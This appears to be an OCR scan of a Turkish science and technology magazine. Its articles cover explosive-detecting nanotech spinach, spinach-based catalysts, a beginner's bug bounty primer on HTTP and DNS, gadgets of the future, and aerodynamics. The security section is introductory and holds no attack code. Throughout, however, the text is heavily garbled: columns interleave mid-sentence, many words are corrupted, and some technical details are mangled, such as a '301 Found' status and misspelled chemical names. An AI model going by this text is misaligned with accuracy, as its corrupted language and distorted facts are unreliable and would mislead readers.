ıspanaklar mayın ve benzeri patlayıcıları tespit ede- 
rek ıspanak yapraklarından çeşitli sinyaller üreti- 
yor ve bu gelişmis sinyaller sayesinde bir e-postaya 
dönüştürülebiliyor. Aklımıza her ne kadar uçuk bir 
fikir gibi gelse de bu bilim adamları sahiden e-posta 
gönderebilen ıspanaklar üretmişlerdir. Kullanım alanı 
sınırlaması bulunmayan nano teknolojiden yararla- 
narak üretilen bu bitkiler kendisine bulunan çeşitli 
sensörler sayesinde bağzı maddeleri tespit ederek 
üretici olan bilim insanlarına e-posta göndermekte- 


dir. 





Ispanak köklerinde,çeşitli patlayıcılarda bulunan ma- 
yınlarda bir bileşik olan nitroaromatiklerin varlığını 
tespit ettiği zaman yapraklarından karbon nanotüpler 
olduğu için çeşitli sinyaller üretmektedir.Bu yayılan 
sinyaller sayesinde kızıl ötesi makinalardan veriler 
okunuyor ayrıca yetkili üreticilere e-mail gönderiyor. 


Nano Ispanaklar İlerleyen Dönemlerde Ekolojik 
Araştırmalar İçin Kullanılacak 





Çeşitli araştırmaların başlarına doğru araştırmayı 
yöneten profesör Michael Strano 1spanakların patla- 
yıcıları tespit edebilmesi için ufak toz parçaları yani 
nano partikül adı verilen teknolojiyi kullanmaya 
başlamıştır. Profesör ıspanak bitkilerinin fotosentez 
özelliğini değiştirerek yaprakları yanmaya karşı koru- 
yarak niktid oksidi tespit etmiştir. 





Ve ayrıca profesör şunları belirtmiştir. © Bu bitkiler 
çevre faktörlerine karşı duyarlı olmasından dolayı 
bitkilerin kuraklık gibi çevre etkenlerini önceden 
sezebilme özelliği vardır.Daha sonra ise topraktaki 
su miktarının derinliğini de tespit edebilmektedir 
diyerek sözlerini bitirmiştir. ” 

nbsp; nbsp; nbsp; nbsp; nbsp;Bu projedeki amaç ne 
kadar patlayıcılar için olsada önümüzdeki dönem- 
lerde bu teknoloji çevre faktörlerindeki değişiklikler 
sayesinde kullanım amacına ulaşabilecektir. 
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ISPANAKLAR AYNI ZAMANDA DAHA VERİMLİ 
BİR KATALİZÖR GÖREVİ GÖREBİLİYOR 


Genellikle elektrikli arabalar ve akıllı telefonlarda 
kullanılan metal-hava pili lityum iyon pillerine göre 
daha çok performanslı ve çevreye karşı enerji dostu- 
dur.Amerikalı bilim insanları ıspanak yapraklarında 
bulunan nano karkona maddesine dönüştürdükleri 
zaman daha da kullanışlı hale getirilmiştir. 





Katalizör maddelerinde bulunan demir ve nitrojene 
sahip olan ıspanaklar bu geliştirilen teknoloji için 
olmazsa olmaz biçilmiş kaftandır.Bilim adamları 
ıspanağı su ile yıkadıktan sonra yaprakları toz hali- 
ni alana kadar işlenmeye dahil olarak nano karbon 
haline getirilmektedir. 
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BUG BOUNTY TEMELLERİ 


Eğer hacking konularına yeniyseniz bu döküman; 
internetin nasıl çalıştığını ve tarayıcının adres çubu- 
&una bir internet sitesinin URLİni girdiğinizde arka 
planda ne gibi olayların meydana geldiğine dair te- 
mel bir anlayışın oluşmasını sağlayacaktır. Bir inter- 
net sitesinde gezinmek dışardan basit gibi görünse de 
içerik olarak HTTP istekleri (HTTP reguest), isteğin 
gönderileceği alan adını kimliklendirmek, alan adını 
IP adresine dönüştürmek, istek göndermek ve gelen 
cevabı yorumlamak gibi bir çok gizli ve farklı işlemi 
barındırır. 


Bu bölümde zafiyetler, ödül avcılığı, istemci, sunucu, 
IP adresleri, ve HT'TP gibi birçok temel terminolojik 
terimlerden ve tanımlardan bahsedeceğiz. 


Reguest 


Response 





Client 


Böylelikle zafiyetlerden kaynaklanan ve dolayısıyla 
kişisel bilgilere izinsiz giriş ve erişim gibi çeşitli ey- 
lemler hakkında bilgi sahibi olacaksınız. Daha sonra 
adres çubuğuna bir web sayfasının URL adresini 
girdiğinizde neler olduğunu görecek, HTTP istek ve 
cevaplarının HTTP eylemleri olarak ne anlama gel- 
diğini anlayacaksınız. Son olarak bölümü HTTP'nin 
neden durumsuz yani stateless olduğunu anlatarak 
döküman tamamlanacaktır. 


ZAFİYETLER VE ÖDÜL AVCILIĞI (BUG 
BOUNTY) 

Zafiyet (vulnerability) normal zamanda erişim kaza- 
nılmaması gereken bilgilere, saldırganlar tarafından 
istenmeyen eylemlerle erişim kazanılmasını sağlayan 
uygulama üzerindeki zayıtlıklardır. 


Örneğin bir kayıt tanımlayıcısının ID'sini değiş- 
tirmek, erişmemeniz gereken bilgilere ulaşmanızı 
sağladığından bu durum istenmeyen bir eylem olarak 
anlatılabilir. 


Profil oluştururken; isim soyisim, e-mail, doğum ta- 
rihi ve adres gibi kişisel bilgileri girmenize izin veren 
bir web sayfası düşünün. Bu site bilgilerinizi gizli 
tutacak ve sadece arkadaşlarınızla paylaşmanızı sağ- 
layacaktır. Fakat bu web sayfası eğer ki sizin izniniz 
olmadan başka birinin sizi arkadaş olarak eklemenize 
izin verirse işte bu bir zafiyet demektir. İnternet sitesi 
kişisel bilgilerinizi, arkadaş listenizin dışındaki kişile- 
re vermediği halde bilgilerinize herhangi birinin eri- 
şim sağlamasına olanak verir. Bir siteyi test ederken, 
var olan işlevselliği herhangi birinin veya saldırganın 
nasıl exploit edebileceğini iyi düşünün. 


Ödül Avcılığı (Bug Bounty) bir web sitesine etik 
olarak zarar vermeden bulunan zafiyetin raporlarının 
şirkete veya web sitesine 
iletilmesinden sonra, 
şirketin sorumlu site 
uzmanlarınca temin 
edilen ödül işlemidir. 
Ödül miktarı onlarca 
dolardan, On binlerce 
dolara kadar çıkabilir. 
Ödül avcılığının öde- 
meleri para olabileceği 
gibi, kripto para, ödül 
puanları, hizmet kredi- 
leri gibi farklı ödüller de 


olabilir. 
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Bir şirket ödül avcılığı programı açtığı zaman kulla- 
nıcıların şirketi test edebileceği bir ortam oluşturur. 
Ödül avcılığı bu dökümanda, şirketin web zafiyeti 
testlerini yapabilmek için kurulan bir taslak veya ku- 
rallar bütünü olarak tanıtılacaktır. Fakat bu durumu 
hiçbir zaman VDP (Vulnerability Disclosure Prog- 
ram) ile karıştırmayın. Ödül Avcılığı parasal bir ödül 
vaad ettiği halde VDP de böyle bir vaad yoktur. VDP 
ise şirketin onarması için etik hacker'ların zafiyetleri 
rapor edebileceği bir operasyon biçimidir. Bu dökü- 
manlardaki zafiyetlerin bazılarına ödül verilmemesi - 
ne rağmen, bug bounty programlarında kullanılabile- 
cek türden örnekleri içermektedir. 


İSTEMCİ VE SUNUCU (CLIENT AND SERVER) 
Tarayıcı internete dayanan ve bilgisayarların birbiri- 
ne mesaj göndermesini sağlayan bri networkdür. Bu 
mesajların teknik ismi paketlerdir. Paketler üzerin- 
de gönderici ve hedef bilgilerinin yer aldığı veriler 
bütünüdür. 





İnternet üzerindeki her bilgisayarın kendisine paket 
gönderilmesini sağlayan bir adresi vardır. Fakat bazı 
bilgisayarlar sadece belirli tipteki paketleri alırlar ve 
diğerleri ise sadece kısıtlı bir listeden paket alımına 
izin verirler. Bundan sonrası ise 
paketlere ne yapılacağı ve nasıl 
cevap verileceği konusunda pa- 
keti alan bilgisayara bağlıdır. 


Bu dökümanın amacına göre, 
sadece paketlerin kendisine değil 
içerisindeki verilere odaklanaca- 
&ız. Bunlar da HTTP mesajları- 
dır. Bu bilgisayarlara sunucu ve 
istemci adını vereceğiz. İstekler 
bir tarayıcı, komut arayüzü veya 
başka bir şekilde gelse bile - her 
ne olursa olsun - istekleri baş- 
latan makinaya istemci adını 
vereceğiz. 


Burada sunucu olarak adlandırılan makine ise istek- 
leri alan web sayfaları ve web uygulamalarıdır. Eğer 
bu konsept hem sunucuya hem de istemciye uyuyor- 
sa onlara da makina (computer) adını vereceğiz. 


Çünkü bilgisayarlar, internet üzerinde haberleşirken 
bu haberleşmenin niteliğini ve niceliğini bir standart 
üzerinden yapması gerekmektedir. Bu standart REC 
- Reguest for Comment olarak adlandırılır. Örneğin 
HTTP - Hypertext Transfer Protocol tarayıcınızın 
uzaktaki sunucu ile IP - Internet Protocol üzerin- 
den nasıl iletişim kuracağını belirler. Bu senaryoda 
hem sunucu hem de istemcinin alınan ve gönderilen 
paketleri anlayabilmek için aynı standartlara uymak 
zorundadır. 


BİR WEB SİTES”Nİ ZİYARET EDİNCE NE OLUR? 


Bu dökümanda HTTP mesajlarına odaklanacağı- 
mızdan dolayı, tarayıcınızın adres çubuğuna bir web 
sayfasına ait URL girildiğinde meydana gelen süreç- 
ler, yüksek - seviyeli bir bakış açısıyla değerlendirile- 
cektir. 


ADIM 1: Alan adını ayıklamak (Extracting the do- 
main name) 

Google.coma bir defa girdiğinizde, URLden bir alan 
adı belirlemiş olur. Ziyaret edeceğiniz web sayfası- 
na ait alan adı REC tarafından özelleşmiş kurallara 
uymalıdır. Örneğin alan adı (domain name) sadece 
alfanümerik karakterler ve noktalama işaretlerini 


web browser 
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içerebilir. Uluslararası domain adları ise bir istisna 
olarak bu kitapta ele alınmıştır. Daha fazlasını öğren- 
mek RFC 3490'a göz atabilirsiniz. Alan adı (domain 
name), sunucu adresini bulmak için bir yoldur. 
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services 
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web server 


ADIM 2:IP Adresini Çözümlemek (Resolving an IP 
Adress) 

Alan adı belirlendikten sonra, tarayıcınız alan adı ile 
bağlantılı olan IP Adreslerini çözümlemeye başlar. 
Bu işleme IP Adresi çözümlemesi denir ve internette 
her alan adına ait bir IP Adresi olup 2 türlü IP Adresi 
vardır. 


Internet Protocol Version4 (IPv4) 
Internet Protocol Version6 (IPv6) 


Sadece alan adını kullanarak bir IP Adresini sorgu- 
lamak için, makina DNS (Domain Name System) 
sunucularına bir istek gönderir. DNS; Alan Adı 
(Domain Name) ve IP Adreslerinin tüm kayıtlarının 
tutulduğu özelleşmiş sunuculardır. 


Bu örnekte (google.com) bağlandığımız DNS sunu- 
cusundan gelen IP Adresi 216.58.201.228 IPv4 adresli 
google.coma uymalıdır. 


ADIM 3: TCP Bağlantısı Kurmak (Establishing a 
TCP Connection) 

Bu işlemden sonra http://Www.google.com olarak 
girdiğimiz siteye istemci T'CP - Transmission Cont- 
rol Protocol üzerinden edinilen IP Adresleriyle 80 
numaralı port üzerinden bir bağlantı sağlar. Maki- 
neler birbirleriyle farklı protokollerden de iletişim 
kurabildikleri için TCP protokolünün detayları çok 
önemli değildir. TCP protokolü gönderici ve alıcının 
mesajlarını doğrulayabildiği için 2 - taraflı iletişim 
sağlar ve dolayısıyla veri aktarımı sırasında kayıplar 
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oluşmaz. 


İstek gönderdiğimiz sunucu birden fazla servis ça- 
lıştırıyor olabilir (servisleri bilgisayar uygulamaları 
olarak düşünebilirsiniz). Dolayısıyla gelen istekleri 
bir düzene sokabilmek için ve sınıflandırabilmek 
için portlar kullanılır. Portları sunucuların internete 
açılan kapıları olarak düşünebilirsiniz. Port'lar olma- 
saydı sunucuya gelen veriler farklı işlemleri yapan 
uygulamalara gitmesi gerekirken aynı işlemi yapan 
uygulamalara giderdi ve karmaşa çıkardı. 


Bu durumda servislerin birbirleriyle ne şekilde 
işbirliği kuracağı ve bir servise gelen verinin diğer 
servisten veriyi çalmayacağı şekilde bir standart 
tanımlamamız gerekir. Örneği 80 numaralı port 


şifrelenmemeiş HTTP isteklerinin alındığı ve gön- 
© Gr / rr rp, 1 > İNE 


derildiği standart bri porttur. Bir diğer sık kullanılan © Host: www. google com — > ME 
: ö 5 . © Connection: keep-aliv ——— > GE 
port ise 443 numaralı şifrelenmiş HTTPS istekle- Büyüyen  —İ 
rinin kullanıldığı porttur. 80 numaralı port HTTP, el e e e 


443 numaralı port HTTPS için olsa da TCP iletişimi 
yöneticinin uygulamayı ne şekilde konfigüre ettiğine 
bağlı olarak herhangi bir port üzerinden de gerçek- Tarayıcı I No'lu dizinden bir GET isteği üretir. Bu 
leştirilebilir. istek web sayfasının root dizinidir. Bir web sayfasının 
içeriği aynı bir bilgisayarın içindeki dosyalar ve di- 
ADIM 4: HTTP İsteklerini Göndermek (Sendingan O zinler gibi organize edilmiştir. Her dosyanın derinli- 


Listing 1-1: Sending an HTTP reguest 


HTTP Reguest) ğine indikçe dosya adları bir “/” işareti ile kaydedilir. 
Örnek olarak googledan devam edecek olursak, Sitenin ilk sayfasını ziyaret ettiğinizde root dizinine 
Adım 3'teki bağlantı başarılıysa, tarayıcınız bri HTTP erişim sağlarsınız. Tarayıcı HTTP version 1.1 proto- 
isteği düzenleyecek ve gönderecektir. kolünü kullandığını gösterir. Bir GET isteğinin yap- 


tığı iş sadece bilgiyi geri getirmektir. 2 numaradaki 
makinaya ait başlık (host header) gönderilen isteğin 
bir kısmı olarak işlem görür. HTTP 1.1'in verilen IP 
Adresine ait sunucuyu kimliklendirmesi (identity) 
gerekir. Çünkü bir IP Adresi birden çok domain 
belirtebilir. 3 numaralı yerde connection header diye 
adlandırdığımız yerdir ve bağlantının sık sık kurulup 
geri kopmasını engellemeyi sağlar ki bu şekilde gelen 
isteklerden sonra oluşan bağlantının devamlılığı sağ- 
lanır. 4 numaralı yerde beklenen cevabın (response) 
formatını görebilirsiniz. Bu şartlar altında beklediği- 
miz format /” ile ayrılmış şekilde It;application/html 
gt idi fakat cevabı farklı formatlarda da alabiliriz. Bu 
formatlar: Itşapplication/json gt;, Itşapplication/html 
gt;, İtapplication/octet-stream gt; veya text-plain 
şeklinde de olabilir. Son olarak 5 numarada görülen 
User-Agent isteği göndermekten sorumlu olan yazılı- 
ma işaret eder. 


ADIM 5: Sunucu Cevabı (Server Response) 
Giden isteğe sunucu aşağıdaki gibi bir cevap verir. 





Burada bilinen 200 durum 
kodlu (status code) HTTP 
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0 HTTP/1.1 200 OK 


vw Content-Type: text/himl 
cevabı, HTTP 1.1 üzerinde <html> 
.. Te <head> 
gösteriliyor. Durum Kodları di emma “Bein 
<title>Google.com</title> 
önemlidir. Çünkü sunucunun <head> 
<body> 


gelen istekleri nasıl cevapla- 
dığını gösterir. RCFde tanım- 
landığı gibi bu kodlar 3 basa- 
maklı sayılar olup 2,3,4 veya 5 
ile başlayabilirler. Bu kodların 
sunucular tarafından tam ola- 
rak özelleşmiş kodlar olma- 
dığı bilinse de 2xx şeklindeki 
kodlar isteğin başarılı şekilde 
ulaştırıldığını söyler. Çünkü 
HTTP kodlarının nasıl ve ne 
şekilde uygulanacağına dair 
henüz tam bir kural yoktur. 
Dolayısıyla HTTP mesajlarında uygulama hatası 
yazmasına rağmen çalışan bir web uygulamasından 
200 kodu alabilirsiniz. 3 Numaralı bölgede ise is- 

tek ve gelen cevap ile bağlantılı olarak oluşturulan 
HTTP mesajı içeriğidir. içerik çok fazla olduğu için 
---snip--- ile ayrılmıştır. Yani ekrana basılmamıştır. 
Çünkü söz konusu site google.comdur. Bu metin bir 
web sayfasına ait olduğu için HTML şeklinde gelen 
cevaptır. Fakat bu cevaplar bir web uygulamasına ait- 
se json olarak da dönebilir. Content - Type - Header 
(2) dediğimiz yer body olarak adlandırılan medya 
tipini belirler. Medya tipi body tarayıcının içeriğini 
ne şekilde yorumlayacağını belirler. Fakat tarayıcılar 
her zaman uygulamadan dönen cevaba bakmaz- 

lar. Bunun yerine MIME sniffing yaparlar. Bu body 
içeriğinin ilk bitini okuyacak medya tipini belirler- 
ler. Uygulamalar bu tarayıcı davranışını headera X 

- Content - Type - Options: no-sniff diyerek kapata- 
bilirler. Tabi biz bunu bir önceki örnekte görmedik. 
3xx ile başlayan diğer cevap kodları bir yönlendirme 
(redirect) olduğuna dair bilgi verir. Ki bu bilgi ile 
tarayıcının ek bir istek yapabilmesini sağlar. Örneğin; 
teorik olarak eğer ki google sizi bir URLden diğer 
URL kalıcı olarak yönlendiriyorsa 301 cevap kodu 
döner. Tam tersine 302 cevap kodu da geçici bir yön- 
lendirme sağlar. 3xx durum kodu alındığında tarayıcı 
URLE yeni bir lokasyon bilgisi ekleyerek HTTP isteği 
gönderir. 


gi --Snip-- 
</body> 


</htmil> 


HTTP/1.1 301 Found 1 


Location: https://Wwww.google.com/ 
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Listing 1-2: Server response 


ADIM 6: Cevapları İşlemek (Rendering Response) 
Sunucu; içerik şekli It;text/html gt; olan 200 kodlu ce- 
vabı gönderince, tarayıcı aldığı içeriği işlemeye baş- 
layacaktır. Gelen cevabın body kısmında tarayıcının 
kullanıcıya hangi verileri sunacağı belirtilmektedir. 


Örnekten hareket edecek olursak, sayfa iskeletinde 
HTML, sayfanın görsel bütünlüğünde CSS, video ve 
fotoğraflar gibi medya ve ek dinamik işlevleri için de 
Javascript kullanılmaktadır. Sunucu için XML gibi 
farklı içerikleri göndermek mümkün olsa bile bu 
dökümanda temel bilgiler işlendiği için bu konuyu 
ileride ele alacağız. 


Web sayfaları için CSS, Javascript ve çeşitli medya 
içerikleri gibi harici dosyaları tanımak mümkün olsa 
da, tarayıcı bu şekilde tanımlanan her bir içerik için 
ek HTTP isteği düzenlemek zorundadır. Tarayıcı bu 
ek dosyalara istek düzenlerken, gelen cevabı ayrıştırır 
(parse) ve body kısmında belirtilen içerikleri size bir 
web sayfası olarak sunar. 


Bu arada Javascript'in her tarayıcı tarafından yo- 
rumlanabilen ve desteklenen bir script dili olduğunu 
bilmeniz elzemdir. Javascript web sayfalarına, siteyi 
tekrar yüklemeksizin içeriği güncelleme, - bazı say- 
falarda - parolaların zayıf veya güçlü olup olmadığını 
kontrol etme gibi çeşitli dinamik işlevler kazandırır. 
Diğer programlama dillerinde olduğu gibi, Javascript 
değişkenlerin içerisine değer atamak, web sayfala- 
rından gelen cevaplarda kod çalıştırmak gibi tüm- 
leşik işlevlere sahiptir. Aynı zamanda çeşitli tarayıcı 
APTlerine (Application Programming Interface) 
erişimi vardır. Bu APL'ler Javascript kodlarının diğer 
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sistemlerle etkileşime girmesini sağlar ki en önemli- 
lerinden biri DOM (Document Object Model) dir. 


DOM sayesinde Javascript kodlarıyla bir web say- 
fasına ait HTML ve CSS kodlarına erişme ve onları 
değiştirme olanağı elde edebilirsiniz. Bu durum 
önemlidir çünkü saldırgan bir web sayfası üzerinde 
kendine ait kodları çalıştırma olanağı bulabiliyorsa, 
DOMAa da erişimi var ve hedeflenen kullanıcı üze- 
rinde çeşitli işlemler yapabilecek demektir. İleriki 
bölümlerde bu konu detaylı incelenecektir. 


HTTP İSTEKLERİ (HTTP REGUEST) 

İstemci ve sunucu arasındaki anlaşmada HTTP 
isteklerinin nasıl işleneceği konusu yapılan istekle- 
rin metotlarının tanımlanmasına bağlıdır. Bir istek 
metodu (reguest method), istemcinin yaptığı isteğin 
amacına ve sunucunun başarılı sonuç için beklenti- 
leri ile ilgilidir. Çünkü internet birbirlerinden uzak 
bilgisayarların iletişimi için tasarlanmıştır evet, ama 
istek metodları da bu ağ üzerinde gerçekleştirilen 
eylemlerin birbirinden ayrılması için geliştirilmiş ve 
uygulanmıştır. 


Bir HTTP standardı aşağıdaki istek metodlarını 
içerir: 


GET, HEAD, POST, PUT, DELETE, TRACE, CON- 
NECT AND OPTTONS (PATCH uygulamada 
önerilmektedir fakat HTTP RECde genel olarak 
uygulanmaz.). Bu döküman boyunca tarayıcılar 
HTML kullanarak sadece GET ve POST istekleri 
göndereceklerdir. Fakat herhangi bir PUT, PATCH 
veya DELETE gibi isteklere rastlarsanız bilin ki bu 
istekler Javascript tarafından çalıştırılmaktadır. İleriki 
bölümlerde zafiyetlerle ilgili örnekler yapılırken bu 
metod tipleriyle sıkça karşılaşacaksınız. 
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Geleceğe Damga Vuracak 9 Teknolojik 
Gelişme 


Bugünün teknolojisi hayatımıza yeni anlam kat- 
maktadır.Hayatımızın her alanına girmesiyle bir- 
likte günümüzün ihtiyaçlarını karşılamaya devam 
etmektedir.Bu sayede teknolojik gelişmeler ve lüks 
tanımlamalar hızla birleşmektedir.Gelin önümüzdeki 
teknolojilere bir göz atalım. 


Akıllı Ayna 





Yeni nesil akıllı aynaların önüne geçtiğiniz zaman 
verdiğiniz sesli komutlara göre iş yapabilmektedir. 
Şahsa göre ses tanıyarak aynanın etrafı bizim için 
ışıkları yakmaktadır.Bu teknolojinin diğer versiyo- 
nu ise Google asistan alt yapısındadır. Uyandığınız 
zaman sabahleyin akıllı aynanızın karşısında hava 
durumu raporlarını, trafiğin durumunu, gibi çeşitli 
gündelik işlerimizi kolaylaştırmaktadır. 


Akıllı Giyim Dolabı - Gardrop 





<a 


Kıyafetlerinizi temiz ve hijyenik bir şekilde saklayan 
bu akıllı gardrop gündelik hayatımızda bize kolaylık 
sağlamaktadır.Güzel bir görünüme sahip olan bu gar- 
dırop içerisinde fazlaca askı takma yeri olduğu için 
daha çok eşyayı saklamanıza imkan sağlamıştır. Ve 
ilerideki zamanlarda yapay zeka ile birleştiği zaman 
çoğalan bu ürünler hayatımızdaki işlerimizi daha da 





kolaylaştıracaktır. 


Evde Topraksız Tarım 





Tarım işine girecek olanlar yada var olan çiftçiler 
mahsüllerini yeni nasil akıllı cihazları ile kontrol 
edebilmektedirler. Telefona indirilen bu uygulama 
sayesinde teknolojiyi son sistem verimli bir şekilde 
kullanabilmektedirler.Bir düşünün sağlığınızdan 
şüphe etmeden alışveriş yapılamayan bu dönemde 
taze ve hormonsuz gıdaya evimizden erişsek daha 

iyi olmaz mıydı?Polimer film, herhangi bir düz dış 
yüzeyde meyve ve sebze yetiştirmeyi mümkün kılan 
son teknoloji bir tarım yöntemidir.Bir kere kullanma- 
ya mahsuz bebek bezleri gibi ev ürünlerinde çokça 
kullanılan güçlü bir malzemeden yapılmış bir filmdir. 
Hidrojene dayalı bu film milimetrenin milyonda 
birini ölçen çok sayıda nano boyutlu gözenekle su ve 
besinleri emerek çalışmaktadır. 


Cilt Leke Silgisi 





Cildimizden yani yüzümüzden bahsedecek olur isek 
teknolojik silgisi gerçek de yüz ve elimizdeki yaşlılık 
hormon belirtisi için geliştirilmiş küçük printerdir. 
Procter Gamble tarafından halka sunulan bu tek- 


noloji yani leke silgisi yaşlılık,şişmiş damarlar çiller 
ve siyah noktalar gibi bir çok rahatsızlığı gizlemek 
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için ufak çapta makyaj uygulamaktadır.Bu sayede özelliği kemeri giyenin düşmemesi için bel çevresini 
cildinizden sizi rahatsız eden pruzlerden uzaklaşmış Oo ölçebilmesidir.Diğer bir yandan ise Apple Watch ile 
olmaktasınızdır. rekabet etmesidir.Son olarak çok yemek yemesi ile 

sağlık uyarısı vermektedir.Önümüzdeki zamanlarda 
DNA Bilekliği daha da gelişecek bir teknolojidir. 


Kişisel Mobil Araçlar 





adım uygulandığında olumlu sonuçlar göstermek- 


tedir. Ve bu düşünce ile üretilen akıllı bileklikler Otomobil dünyasının hangi yönde nasıl seyehat etti- 
sayesinde yediğiniz kek,pasta,abur cubur gibi gıda ğini görmek için robot teknolojileri sergilenmektedir. 
maddelerini yerken sizi uyarmaktadır bu DNA Fuarda bize sunulan teknolojik gelişmeler benzersiz 


Bilekliği. Asıl amacı ne yiyip ne yemeyeceğimizi bize sür üş hazzı ver mektedir.Otomobil şir ketleri biz müş- 
bildirmektir.Bu bileklik giyilebilir olmasından dolayı ( terilerine sunduğu benzersiz sürüş deneyi sunmak- 
bizim kendi DNA mıza göre alışveriş yaparken akıllı (| tadır.Yeni yeni üretilen bu mobil araçlar çevre dostu- 
ve kontrollü seçim yapmamızı kolaylaştırmaktadır. dur.Son olarak artık tüm yolculuklarımız elektrikli ve 
Örneğin yüksek tansiyonunuz var ise bu bileklik o SESSİZ. 
ürünü yememeniz için Sizi uyarır. ğ 

Öğrenen ve Seninle Yaşayan Robot 
Akıllı Kemer 





Bir takım insanlar teknolojiye çok yakın ve yenilikçi- 
dir.Halbuki bu nesil, teknolojiyi de kullanarak bizlere 
günlük rutinlerimizi daha önceki jenerasyonlar gibi 
yerine getirmek zorunda olmadığımızı gösteriyor. 
Tüketici Elektroniği Fuarı bağzı girişimler sonucu 
gençlere yönelik yapay zeka robotik uygulamalar 
yaygınlaşacağından dolayı rutin gündelik işlerimize 
yardımda bulunabilecektir.Ayrıca bu robotlar çöp- 





Aslında ilk gördüğünüz zaman diğer gözlüklele hiç 
bir farkı olmadığını anlayacaksınız.Bu akıllı kemerin 
içinde bir çok sensör bulunmaktadır.İçindeki çeşitli 
algılayıcılar ile kemeri giyenin fiziksel ruh hali takip 
ediliyor.Bu kemerin en dikkat edilmesi gereken 





lerimizi atmak da veyahut yemek yapımında bizlere 
yardımcı olacaktır. 


Giyilebilir Teknolojiler 





Bu tarz giyilebilir teknolojiler oldukça büyük ilgi gör- 
mektedirler. Ve de pazar payı çok büyüktür.Hemen 
hemen yeni yazılımlar park sensörleri yeni dizaynlar 
güçlenmiş piller bu teknolojiyi ayakta tutumaktadır- 
lar.Akıllı sensör teknolojisinedeki gelişmeler yada 
akıllı kumaş bulut bilişim ve oldukça daha fazla giyi- 
lebilir ürünleri bir adım ileri sarmıştır. 
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AERODİNAMİK NEDİR? 
Bkz: derodynamizs 'bavu devinim bilin (tren) 


Değerli arkadaşlar, 


Hu çeviri tabanlı yazıda size “aerodinamik” temellerini arılatmaya çalışacağımı. Doğrudan 
çeviri yapıları alanlar İnmek içerisinde eğik yoz!" ile ayrıştırılmıştır. 





Bir yerden bir yere hava içerisinde hareket eden veya hareketinde hava ile teması cları 
her nesne, aerodinamik yasaları çerçevesinde geliştirilmeye çalışılmaktadır. Yalnızca 
uçaklar ve raket, mermi vs gibi uçarı nesneler değil, ayrı zamanda araba, tren gibi kara 
araçları ve hatta bisiklet ve uçurtma dahli bu kategoriye girmektedir. Üte yandan, 
nesnenin sabit durup havanın ona doğrudan etki ettiği durumlar da vardır Jörneğin 
yüksek hiralar, köprüler vb). 


Aerodinamik bilimi çerçevesinde bilimsel veriler ve rüzgar tünelleri gibi dermeysel 


çalışmalarla bu araçların maksimum hareket ve enerji verimliliği için fiziksel yapıları 
tasarlarımaktadır. 


Paki nadir aerodinamik? 





Bu yazımını ana kaynağı olanı (fink aşağıda) NASA kaynağına göre gerodinamik: 


“Haovarım, mesnelerin etrafında horeket etme şekline denir. Aerodinamik kurallari, bi 
üçeğm nosui hovoda uçohlidiğini açıklar. Hovoda hareket ederi her şey oerodinomiğe tepki 
verin farlaima rampasından fırlayan bir roket ve dahi gökyüzündeki! bir uçurtma, 
gerodinnmije tepki verir. Aerodhhomik ayrıcı, hava arabaların do etrafında dolaştığı için 
orobalara bile etki eder. 
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Tabii aerodinamik deyince hesaba katmamız gerekenler, yalnızca havanın 
nesnelerin/araçların etrafındaki hareketi dolayısıyla oluşturduğu hava direnci ve 
sürtünme kuvveti değil. Bu kısımdan sonrası, dahes ziyade günümüzde kullarıları starıdart 
yapıdaki uzaklar üzerinden ilerleyecek. Ama genel olarak bu prensimleri, havanın etki 
ettiği tüm nesneler için genelleyebilirsiniz! 


i Bir uçağa etki ederi 4 kuvvet burada 
. Gla devreye girmektedir. 

“Uçuşa etki eden “kuvvet ' Kaldırma, 
ağırlık (yerçekimi itme fsürot) ve 
sürüklemedir (hovwo renci) Bu 
kuvvetler, bir nesnenin yukorn vE 
aşağı, ve doha hzl veyo dohr yavaş 

| hareket etmesini soğlur. Her kuvvetin 
i Ağırlık miktarı, MESMEMİN havadaki 





hareketini değiştirir. 


Simdi bü 4 kete yakından bakalim, 


Ağırlık Nedir? 


“Dürryodaki her şeyin bir ağırlığı vordir. Bu kuvvel, nesneleri oşoği çeken yerçekiminden 
kaynakların. Uçmak içim, bir uçağın onu yer çekiminin oks yönünde Mecek/koldrocok bir 
şeye ihtiyam vardır. Br nesnenin ağırlığı, itmenin ne kodar günü olmasi gerektiğini 
belirler. Bir uçurtma, Jumbo Jetlerden çok daha 07 yukarı İfmeye İhtiyaç duyar.” 

gi Ağırlık kuvvwelinde ana kavram 
yerçekimidir. . Dünyanın çekim 
gücü dolayısıyla mesmeler, 
“ DA m/s> * kadar bir ivme İle 
dünyanım çekim merkezine doğru 
hareket etme eğilimindedir. Bu 
sebeple, kütlesi İle orantılı bir 
ağırlık meydana getirir. Bu kuvvete 
eşit bir kuvveti ters yönde 
uygularsak, mesne havada asılı 
kalır. Nesnenin yükselebilmesi içir, 
ağırlık kuvvetinden fazla bir yukarı 
ire (kaldırma) kuvveti 
uygularıması gerekir, 





Kaldırma Nedir? 


“Kaldırma, bir şeyin yukarı yönlü hörekeline izin veren ilmedir. Ağrlığın ii olon 
kuvvettir. Uçan her şeyin Kkoldirilmesi gerekir. Hir uçağın yukori doğru horeket edebilmesi 
için ağırlıktan dahe forle kaldırmaya sohip olmasi gerekir. Bir sıcak hovo balmu 





CWBEST GÜNCEL BİLİM VE TEKNOLOJİ DERGİSİ 


için ağıriktean dehe forle kaldırmaya sohip olması gerekir. Bir sıcak hovo balmu 
yükselmesinin sebebi içindeki sicok havanın etrafındaki havadan daho hafif olmasıdır. 
Scak hav yükselir ve balonu beraberinde tasir Helikopterin koldirma Kuvveti, 
helikopterin tepesindeki! rotor kanatlarınden (pervonelerden)| gelir. Hoevmdaki hereketleri 
helikopteri yukarı doğru hereket ettirir. Bir uçağm koldırma kuvveti İse kanatlarından 


gelir. 
Uçağı kaldıran kanatlarıdır. 
Ch Hilinenin aksine motoru 
“m değil. oo Tabii o kanatlarım 
Angle cf kaldırma o İşlerini (oOyerlne 
Mitack İ Lr | 
— getirebilmesi, gerekli olar 
dm ği aerodinamik hareketini 


p Ki i sağlanması İçiri itki sağlayan 
Zentre af # A motorlar Okullarılır. Bura 
Pressure aşağıda değineceğim. 





Uçak ileri doğru hareket ederken, uçağa karşıdarı etki eden hava uçak yüzeylerinin 
etretındarı, uçağını serodinamiz yapısına göre kayıp gider. Bu hava hareketl esnasında, 
uçağın kanat tasarımı sayesinde kanatlarını Üzerinden geçen hava, altından geçen 
havadan çok daha hızlı hareket eder ve alçak basınç alanı oluşturur. Kanadını altında ise 
yüksek basınç alanı oluşur. Bu basınç farkı sebebiyle hava, uçağın kanatlarına alttan 
yukarıya doğru bir kuvvet uygular. Bu sayede uçak ağırlık (yerçekimi) kuvvetine rağmen 
